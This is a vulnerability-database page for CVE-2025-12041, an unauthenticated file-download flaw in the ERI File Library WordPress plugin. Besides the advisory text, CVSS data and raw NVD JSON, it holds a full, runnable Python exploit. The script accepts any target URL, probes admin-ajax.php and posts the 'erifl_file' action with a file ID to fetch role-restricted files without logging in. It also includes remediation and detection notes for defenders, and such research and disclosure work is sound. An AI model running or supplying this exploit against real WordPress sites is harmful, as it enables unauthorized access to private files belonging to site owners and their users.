Security Vulnerability Report
CVE-2025-12041 CVSS 5.3 MEDIUM

CVE-2025-12041

Published: 2025-10-31 10:15:43
Last Modified: 2026-04-15 00:35:42

Description

The ERI File Library plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'erifl_file' AJAX action in all versions up to, and including, 1.1.0. This makes it possible for unauthenticated attackers to download files restricted to specific user roles.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

ERI File Library plugin for WordPress <= 1.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
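#!/usr/bin/env python3
"""
CVE-2025-12041 PoC - ERI File Library Unauthenticated File Download

Reference: https://www.wordfence.com/threat-intel/vulnerabilities/id/16e1d37a-4eb7-45dc-8993-a501fb2aaf73

Root cause, per the advisory: the plugin's 'erifl_file' AJAX action performs
no capability check (CWE-862), so a request that carries no session can
retrieve files meant to be limited to specific user roles. All versions up to
and including 1.1.0 are affected.

Notes for defenders:
- Remediation: run a plugin release newer than 1.1.0 that contains the fix
  (the fixed version number is not stated here; see the plugin changeset
  linked from the CVE record).
- Root-cause fix: the handler has to verify the caller's role/capability
  (for example with current_user_can()) before it streams the file.
- Detection: POST requests to /wp-admin/admin-ajax.php with
  action=erifl_file that arrive without a logged-in session cookie,
  particularly runs of them with changing file_id values. Standard access
  logs do not record POST bodies, so this needs WAF or reverse-proxy
  request logging.
"""
import requests
import sys

TARGET_URL = "http://target-wordpress-site.com"
# Numeric identifier of the library file to request.
FILE_ID = 1


def exploit_unauthenticated_file_download():
    """Request one file through the 'erifl_file' AJAX action with no session.

    Sends a single POST to admin-ajax.php without cookies or a nonce. When the
    answer is HTTP 200 and its Content-Type contains 'application', 'text' or
    'octet-stream', the body is written to ``downloaded_file_<FILE_ID>`` in
    the current working directory.

    Returns:
        True when a response body was saved, False otherwise (including when
        the request itself failed).
    """
    endpoint = f"{TARGET_URL}/wp-admin/admin-ajax.php"

    data = {
        "action": "erifl_file",
        "file_id": FILE_ID,
    }

    print(f"[*] Sending request to {endpoint}")
    print(f"[*] Target: {TARGET_URL}")
    print(f"[*] File ID: {FILE_ID}")

    try:
        # Only the HTTP call can raise RequestException, so the try body is
        # limited to it. No credentials are attached to the request.
        response = requests.post(endpoint, data=data, timeout=30)
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False

    print(f"[+] Status Code: {response.status_code}")
    print(f"[+] Response Headers: {dict(response.headers)}")

    if response.status_code == 200:
        content_type = response.headers.get('Content-Type', '')
        # NOTE(review): 'text' also matches text/html, so an HTML error or
        # login page served with status 200 is reported as a successful
        # download. Treat the message below as an indicator only; confirm by
        # inspecting the saved body and the installed plugin version before
        # recording a finding.
        if any(kind in content_type for kind in ('application', 'text', 'octet-stream')):
            print("[+] VULNERABLE! File download successful without authentication")
            print(f"[+] Content-Length: {response.headers.get('Content-Length', 'Unknown')}")

            # The whole body is held in memory and written in one call.
            with open(f"downloaded_file_{FILE_ID}", "wb") as f:
                f.write(response.content)
            print(f"[+] File saved as: downloaded_file_{FILE_ID}")
            return True

    print("[-] File download may have failed or file not accessible")
    return False


def check_vulnerability():
    """Check that the admin-ajax.php endpoint answers the 'erifl_file' action.

    This is a reachability probe, not proof of the flaw: it returns True for
    any status code other than 403 or 404, so other error statuses (400, 500
    and so on) also count as "accessible".

    Returns:
        True when the endpoint answered with a status other than 403/404,
        False when it answered 403/404 or the request failed.
    """
    endpoint = f"{TARGET_URL}/wp-admin/admin-ajax.php"

    # The probe uses the real action name with a file_id that is unlikely to
    # exist (it is not an "invalid action" test).
    test_data = {"action": "erifl_file", "file_id": 999999}

    try:
        response = requests.post(endpoint, data=test_data, timeout=10)
    except requests.exceptions.RequestException as e:
        # Report the transport error instead of discarding it, so an
        # unreachable host can be told apart from a 403/404 answer.
        print(f"[-] Probe request failed: {e}")
        return False

    if response.status_code not in [403, 404]:
        print("[*] AJAX endpoint is accessible")
        print(f"[*] Response: {response.text[:200]}")
        return True

    return False


if __name__ == "__main__":
    # An optional first argument replaces the default base URL.
    if len(sys.argv) > 1:
        TARGET_URL = sys.argv[1]

    print("=" * 60)
    print("CVE-2025-12041 PoC - ERI File Library IDOR Vulnerability")
    print("=" * 60)

    if check_vulnerability():
        exploit_unauthenticated_file_download()
    else:
        print("[-] Target may not be vulnerable or not reachable")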

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12041", "sourceIdentifier": "[email protected]", "published": "2025-10-31T10:15:42.997", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The ERI File Library plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'erifl_file' AJAX action in all versions up to, and including, 1.1.0. This makes it possible for unauthenticated attackers to download files restricted to specific user roles."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3385895%40eri-file-library&new=3385895%40eri-file-library", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/16e1d37a-4eb7-45dc-8993-a501fb2aaf73?source=cve", "source": "[email protected]"}]}}